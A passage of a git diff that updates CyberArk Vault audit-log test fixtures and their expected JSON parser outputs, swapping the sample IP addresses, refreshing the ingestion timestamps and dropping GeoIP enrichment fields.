code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615819476\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "1", - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, 
@@ -1030,7 +939,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -1043,7 +952,7 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615819476" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", 
@@ -1057,8 +966,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176788400Z", - "original": "\u003c7\u003e1 2021-03-15T14:44:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:44:37\",\"IsoTimestamp\":\"2021-03-15T14:44:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403111200Z", + "original": "\u003c7\u003e1 2021-03-15T14:44:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:44:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:44:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n 
\u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=1;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615819476\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or 
password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UseSudoOnReconcile\\\" Value=\\\"Yes\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 07:44:37\",\"IsoTimestamp\":\"2021-03-15T14:44:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #1). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;retriescount=1;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"1\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615819476\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"UseSudoOnReconcile\",\"Value\":\"Yes\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log index 0d2f4d0e96e..4fefbe43db6 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log 
@@ -1,8 +1,8 @@ -<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T18:46:47Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-10T22:20:12Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T09:11:54Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:54","IsoTimestamp":"2021-03-10T09:11:54Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_localhost.localdomain","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_localhost.localdomain.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T17:58:05Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:05","IsoTimestamp":"2021-03-10T17:58:05Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"Administrator","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMNotifications","File":"Root\\SessionControl","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T18:46:47Z VAULT 
{"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:46:47","IsoTimestamp":"2021-03-10T18:46:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSMServer.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-10T22:20:12Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:20:12","IsoTimestamp":"2021-03-10T22:20:12Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMApp_ASR-WIN","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMLiveSessions","File":"Root\\PSM-ASR-CYBERARK-WI.LiveSessions","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-11T16:50:29Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:50:29\n 2021-03-11T16:50:29Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PVWAAppUser\n Create File Version\n \n \n PSMSessions\n Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b\n 10.0.1.20\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:50:29","IsoTimestamp":"2021-03-11T16:50:29Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PVWAAppUser","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMSessions","File":"Root\\ec7c3e3bd11069dd20a491a6b11bbe293bf4780b","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} -<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 81.32.170.205\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-11T16:59:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 08:59:58\n 2021-03-11T16:59:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_VAGRANT\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_VAGRANT.LiveSessions\n 67.43.156.13\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 08:59:58","IsoTimestamp":"2021-03-11T16:59:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_VAGRANT.LiveSessions","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} <5>1 2021-03-14T12:07:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:07:32\n 2021-03-14T12:07:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PasswordManager\n Create File Version\n \n \n AccountsFeedDiscoveryLogs\n Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log\n 10.0.1.20\n \n \n \n \n \n Create File Version\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:07:32","IsoTimestamp":"2021-03-14T12:07:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PasswordManager","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"AccountsFeedDiscoveryLogs","File":"Root\\Windows discovery from ELASTIC.local_PasswordManager_UID1.log","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":"10.0.1.20"}}} -<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 34.71.250.247\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File 
Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} +<5>1 2021-03-14T12:57:27Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 05:57:27\n 2021-03-14T12:57:27Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 62\n Create File Version\n Info\n PSMPApp_SSH\n Create File Version\n \n \n PSMPLiveSessions\n Root\\PSMPApp_SSH.LiveSessions\n 67.43.156.15\n \n \n \n \n \n Create File Version\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 05:57:27","IsoTimestamp":"2021-03-14T12:57:27Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"62","Desc":"Create File Version","Severity":"Info","Issuer":"PSMPApp_SSH","Action":"Create File Version","SourceUser":"","TargetUser":"","Safe":"PSMPLiveSessions","File":"Root\\PSMPApp_SSH.LiveSessions","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Create File Version","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json index 7cb40182c36..f9982edaafc 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-62-create-file-version.log-expected.json 
@@ -7,20 +7,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
